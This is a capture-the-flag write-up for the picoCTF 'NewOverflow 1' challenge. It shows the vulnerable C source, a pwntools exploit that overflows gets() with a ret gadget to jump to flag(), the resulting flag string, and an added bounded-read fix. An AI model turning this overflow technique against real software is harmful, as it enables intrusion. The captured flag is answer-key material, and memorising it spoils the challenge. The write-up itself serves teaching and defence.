NewOverflow 1
Lets try moving to 64-bit, but don't worry we'll start easy. Overflow the buffer and change the return address to the flag function in this program. You can find it in /problems/newoverflow-1_5_bd04c7682164df72135e036dd527b668 on the shell server. Source.
Now that we're in 64-bit, what used to be 4 bytes, now may be 8 bytes
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFFSIZE 64
#define FLAGSIZE 64

void flag() {
    char buf[FLAGSIZE];
    FILE *f = fopen("flag.txt", "r");
    if (f == NULL) {
        printf("'flag.txt' missing in the current directory!\n");
        exit(0);
    }
    fgets(buf, FLAGSIZE, f);
    printf(buf);
}

void vuln() {
    char buf[BUFFSIZE];
    gets(buf);
}

int main(int argc, char **argv) {
    setvbuf(stdout, NULL, _IONBF, 0);
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
    vuln();
    return 0;
}
Look at the vuln() function: gets(buf) does not check how many characters we input, so it causes a buffer overflow.
We can use gets() to overwrite the return address of vuln() and redirect the program's control flow to flag().
payload = 'a'*offset + flag_address
There was something wrong on the server, so with that pseudo payload we couldn't get the flag. So I tried adding a ret ROP gadget to make the payload work more smoothly.
from pwn import *

s = process('./vuln')

flag = 0x400767             # address of flag()
ret  = 0x00000000004005de   # address of a lone 'ret' instruction in the binary

payload  = b'a' * 0x48      # fill the 64-byte buffer plus the 8-byte saved rbp (bytes, for Python 3)
payload += p64(ret)         # extra ret gadget so the payload works more smoothly
payload += p64(flag)        # new return address: flag()

s.sendline(payload)
s.interactive()
picoCTF{th4t_w4snt_t00_d1ff3r3nt_r1ghT?_351346a2}
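For comparison, here is how vuln() looks once the unbounded gets() is replaced by a length-checked read. This is an added example, not part of the challenge source or the writeup; read_line(), vuln_fixed() and the read_line_from_string() helper are hypothetical names, and the helper exists only to exercise the function on a constructed in-memory string.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() used in the test helper */
#include <stdio.h>
#include <string.h>

#define BUFFSIZE 64

/* Bounded replacement for the challenge's gets(buf): reads at most n-1 bytes
 * into buf, always NUL-terminates, strips the trailing newline, and drains the
 * rest of an over-long line so the excess can never reach the saved rbp or
 * return address that sit just past the buffer.
 * Returns the number of bytes stored, or -1 if the line had to be truncated. */
int read_line(FILE *in, char *buf, size_t n) {
    if (n == 0) return -1;
    if (fgets(buf, (int)n, in) == NULL) {   /* EOF or error: empty string */
        buf[0] = '\0';
        return -1;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {  /* whole line fit */
        buf[--len] = '\0';
        return (int)len;
    }
    /* No newline seen: either the line was longer than n-1 bytes or EOF
     * came first. Discard up to the newline and report truncation only if
     * anything was actually thrown away. */
    int c, drained = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        drained = 1;
    return drained ? -1 : (int)len;
}

/* Hardened vuln(): same 64-byte buffer, but input can no longer overflow it. */
void vuln_fixed(void) {
    char buf[BUFFSIZE];
    if (read_line(stdin, buf, sizeof buf) < 0)
        fputs("input too long; extra bytes discarded\n", stderr);
}

/* Test helper (hypothetical, not from the challenge): runs read_line() over a
 * constructed in-memory string into a BUFFSIZE buffer supplied by the caller. */
int read_line_from_string(const char *input, char *out) {
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    if (f == NULL) return -2;
    int r = read_line(f, out, BUFFSIZE);
    fclose(f);
    return r;
}
```

Fed the writeup's 0x48 filler bytes plus two 8-byte addresses, read_line() stores only the first 63 bytes, discards the rest and reports -1, so the saved rbp and return address are never touched.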